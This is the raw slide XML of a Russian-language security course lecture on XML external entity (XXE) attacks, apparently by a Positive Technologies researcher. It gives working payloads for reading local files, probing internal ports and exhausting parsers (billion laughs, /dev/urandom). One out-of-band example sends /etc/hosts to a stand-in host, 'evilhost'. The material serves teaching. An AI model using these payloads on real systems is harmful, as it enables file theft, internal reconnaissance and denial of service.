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1" r:id="rId3"/>
    <p:sldId id="265" r:id="rId4"/>
    <p:sldId id="266" r:id="rId5"/>
    <p:sldId id="267" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="270" r:id="rId8"/>
    <p:sldId id="271" r:id="rId9"/>
    <p:sldId id="287" r:id="rId10"/>
    <p:sldId id="294" r:id="rId11"/>
    <p:sldId id="295" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="276" r:id="rId15"/>
    <p:sldId id="277" r:id="rId16"/>
    <p:sldId id="278" r:id="rId17"/>
    <p:sldId id="279" r:id="rId18"/>
    <p:sldId id="274" r:id="rId19"/>
    <p:sldId id="281" r:id="rId20"/>
    <p:sldId id="282" r:id="rId21"/>
    <p:sldId id="291" r:id="rId22"/>
    <p:sldId id="283" r:id="rId23"/>
    <p:sldId id="292" r:id="rId24"/>
    <p:sldId id="293" r:id="rId25"/>
    <p:sldId id="285" r:id="rId26"/>
    <p:sldId id="286" r:id="rId27"/>
    <p:sldId id="290" r:id="rId28"/>
    <p:sldId id="284" r:id="rId29"/>
    <p:sldId id="288" r:id="rId30"/>
    <p:sldId id="280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>
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="-102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079ED-C335-41F9-B49C-78B1BAF7D41C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185F-C226-4C10-9020-94B42FD3F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19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0 - приветствие, о чем эта практика, информация о Купрееве, доп. лекциях и формате проведения семинаров,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13CA4-B1F0-4A01-80E3-A36CF2E29F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82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41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19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247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ервый и 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44400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91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 презент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71438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D3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800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804026"/>
            <a:ext cx="12192000" cy="73025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800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018" y="260350"/>
            <a:ext cx="1860549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5394" y="728700"/>
            <a:ext cx="10981220" cy="324036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0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="PT Sans" pitchFamily="34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5397" y="4239091"/>
            <a:ext cx="10981216" cy="5850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 b="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="PT Sans" pitchFamily="34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35399" y="4734146"/>
            <a:ext cx="10980868" cy="999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200" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="PT Sans" pitchFamily="34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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635397" y="6219311"/>
            <a:ext cx="10981216" cy="629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999999"/>
                </a:solidFill>
                <a:latin typeface="PT Sans" pitchFamily="34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9238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83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14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6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53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39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6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969B-FBCC-466E-8952-F6042420558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28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v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/ru/wrappers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ab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17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ds.rub.de/media/nds/arbeiten/2015/11/04/spaeth-dtd_attacks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blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slideshare.net/d0znpp/onsec-phdays-2012-xxe-incapsulated-re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ns.org/reading-room/whitepapers/application/hands-on-xml-external-entity-vulnerability-training-module-3439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pedia.org/wiki/X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YDWWo83gqljHr2Y3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53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еще?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&lt;tag xsi:noNamespaceSchemaLocation="http://evilip"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>&lt;xs:include schemaLocation="http://evilip"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>&lt;xs:import schemaLocation="http://evilip"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>&lt;?xml-stylesheet href="http://evilip"?&gt;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61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&lt;?xml-stylesheet type="text/xml" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mytest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"?&gt;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xsl:stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mytest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" version="1.0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xmlns:xsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://www.w3.org/1999/XSL/Transform" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xmlns:fo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://www.w3.org/1999/XSL/Format"&gt;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&lt;!-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>replace with your XSLT attacks --&gt;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xsl:import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b="1" dirty="0"/>
              <a:t>http://[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"/&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xsl:template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> match="id('boom')"&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fo:block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> font-weight="bold"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xsl:apply-templates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fo:block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xsl:template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xsl:stylesheet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82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Векторы атаки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Чтение локальных файлов</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Доступ к локальным ресурсам</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Сканирование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>портов</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>хостов</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wrappers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164939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ресурсы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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTTP/1.1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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>xml version="1.0"?&gt;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&lt;!DOCTYPE greeting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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>jiralocal/login.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>" &gt; ]&gt;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&lt;greeting&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;/greeting&gt;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HTTP/1.1 200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>OK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&lt;greeting&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;!DOCTYPE html&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>html&gt;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&lt;head&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>title&gt;Log in - JIRA&lt;/title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a: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…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;/greeting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>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4753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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTTP/1.1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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!DOCTYPE greeting [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>http://127.0.0.1:3306</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>" &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;greeting&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;/greeting&gt;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HTTP/1.1 200 OK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dirty="0" smtClean="0"/>
              <a:t>greeting&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>greeting&gt;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45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/>
              <a:t>://filter/read=convert.base64−encode/resource=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>/hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xpect:// (from PECL)</a:t>
            </a:r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php.net/manual/ru/wrappers.php</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit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02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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unix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&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!DOCTYPE greeting [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>:///dev/urandom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;greeting&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;&lt;/greeting&gt;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28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(billion laughs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attack)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&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lolz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;!ENTITY lol "lol"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ENTITY lol1 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;!ENTITY lol2 "&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;!ENTITY lol3 "&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;"&gt; ]&gt;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lolz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lol3;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lolz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354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Векторы эксплуатации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 в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Out-of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>band</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind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21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Out-of-band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&lt;?xml version="1.0"?&gt;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!DOCTYPE html [	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ENTITY % internal SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>local_file.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>"&gt; %internal;]&gt;	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  <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>title;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>html&gt;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local_file.xml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&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ENTITY title "Hello, World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>!"&gt;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1133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3014663" y="1538289"/>
            <a:ext cx="6176963" cy="197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ru-RU" altLang="ru-RU" sz="3000" dirty="0">
                <a:latin typeface="PT Sans" charset="-52"/>
              </a:rPr>
              <a:t>Основы практической безопасности</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" altLang="ru-RU" sz="3000" dirty="0">
                <a:latin typeface="PT Sans" charset="-52"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" altLang="ru-RU" sz="3000" dirty="0">
                <a:latin typeface="PT Sans" charset="-52"/>
              </a:rPr>
              <a:t>Атака </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ru-RU" sz="3000" dirty="0">
                <a:latin typeface="PT Sans" charset="-52"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" altLang="ru-RU" sz="3000" dirty="0">
              <a:latin typeface="PT Sans" charset="-52"/>
            </a:endParaRP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3024188" y="4036220"/>
            <a:ext cx="6176963" cy="4393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ru-RU" altLang="ru-RU" dirty="0">
                <a:latin typeface="PT Sans" charset="-52"/>
              </a:rPr>
              <a:t>Ярослав Бабин</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3024188" y="4407696"/>
            <a:ext cx="6176963" cy="9655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ru-RU" dirty="0">
                <a:latin typeface="PT Sans" charset="-52"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" altLang="ru-RU" dirty="0">
                <a:latin typeface="PT Sans" charset="-52"/>
              </a:rPr>
              <a:t>Анализ защищенности банковских систем</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ru-RU" dirty="0">
                <a:latin typeface="PT Sans" charset="-52"/>
              </a:rPr>
              <a:t>Positive Technologies</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" altLang="ru-RU" dirty="0">
              <a:latin typeface="PT Sans" charset="-52"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8197" name="Текст 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3024188" y="5522119"/>
            <a:ext cx="6176963" cy="471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r" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" altLang="ru-RU" dirty="0">
                <a:latin typeface="PT Sans" charset="-52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303885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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTTP/1.1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&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DOCTYPE root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ENTITY % remote SYSTEM "http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>://evilhost/trick.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>"&gt;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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>remote; %intern; %trick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]&gt;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trick.xml:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ENTITY % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>payl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/hosts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&lt;!ENTITY % intern "&lt;!ENTITY &amp;#37; trick SYSTEM 'http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>://evilhost/result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>?%payl;'&gt;"&gt;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66360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031"/>
            <a:ext cx="100869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1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Error-based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&lt;!ENTITY % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>payl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>://filter/read=convert.base64-encode/resource=c:/windows/win.ini"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ENTITY % intern "&lt;!ENTITY &amp;#37; trick SYSTEM '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>%payl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>://127.0.0.1:81/'&gt;"&gt;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DOMDocument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
